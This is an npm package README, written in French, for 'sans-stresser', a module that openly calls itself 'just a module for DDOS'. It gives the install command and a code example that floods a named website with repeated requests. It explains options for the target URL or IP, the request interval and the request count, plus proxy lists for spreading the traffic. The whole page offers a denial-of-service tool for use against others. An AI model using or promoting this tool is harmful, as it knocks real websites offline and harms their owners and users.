sans-stresser
v1.0.1
Published
Juste un module pour DDOS
Readme
Sans Stresser
Installation
npm i sans-stresserExample
const { start } = require("sans-stresser");
start(
{
url: "https://searchdata.fr",
interval: 1000,
max: 100
},
(err, ping) => {
if (err) return console.log(err);
if (ping) return console.log(ping);
}) Options
url
url sera l'url ou l'ip a DDOS, si c'est une ip voici le format à adopter http://ip:65535
interval
l'interval sera l'interval par request
max
Le max de requêtes envoyés par interval
proxy
Vous pouvez utiliser un fichier ou une Array comme proxy
